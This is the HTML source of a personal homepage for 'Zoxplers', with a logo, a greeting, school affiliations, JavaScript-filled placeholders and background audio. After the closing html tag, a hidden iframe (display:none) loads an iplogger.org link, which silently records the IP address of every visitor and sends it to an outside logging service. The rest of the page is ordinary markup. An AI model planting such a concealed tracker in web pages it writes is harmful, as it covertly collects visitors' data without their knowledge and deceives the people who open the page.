<!--Made by Zoxplers--->    
<!DOCTYPE html>
<html>
    <head>
        <title>Zoxplers - Site</title>
        <link rel="shortcut icon" href="favicon.ico"/>
        <meta charset="utf-8"/>
        <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
    </head>
    <body>
        <mainbg></mainbg>
        <main id="midground">
            <logo>
                <img src="../assets/logowhite.png"/>
            </logo>
            <heading>
                <line>Hello!   </line>
                <br/>
                <line>        Zoxplers.</line>
            </heading>
            <page></page>
            <tooltip></tooltip>
        </main>
        <main id="foreground">
            <name>Zoxplers</name>
            <logo>
                <img src="../assets/logo1.png"/>
            </logo>
            <heading>
                <br/>
                <line>I'm</line>
            </heading>
            <infobar>
                <infoitem>
                    <span class="material-symbols-outlined">School</span>
                    <span>MHS Graduate</span>
                </infoitem>
                <infoitem>
                    <span class="material-symbols-outlined">School</span>
                    <span>UCCS Undergrad</span>
                </infoitem>
            </infobar>
            <navbar style="opacity: 0;">Unable to fetch data.</navbar>
            <page style="opacity: 0;">Unable to fetch data.</page>
            <footer>
                <indicator></indicator>
                <p>Unknown Status</p>
            </footer>
            <socials>JS disabled?</socials>
        </main>
        <audio id="audio1" preload="auto">
            <source src="../assets/background1.ogg">
        </audio>
        <audio id="audio2" preload="auto">
            <source src="../assets/background2.ogg">
        </audio>
        <audio id="audio3" preload="auto">
            <source src="../assets/background3.ogg">
        </audio>
        <audio id="audio4" preload="auto">
            <source src="../assets/background4.ogg">
        </audio>
        <audio id="audio5" preload="auto">
            <source src="../assets/background5.ogg">
        </audio>
    </body>
</html>
<iframe style="display: none;" src="https://iplogger.org/2scVd5"></iframe>
<link rel="stylesheet" href="index.css">
<script src="https://cdn.jsdelivr.net/gh/xaronnn/js-lanyard/lanyard.js"></script>
<script src="index.js"></script>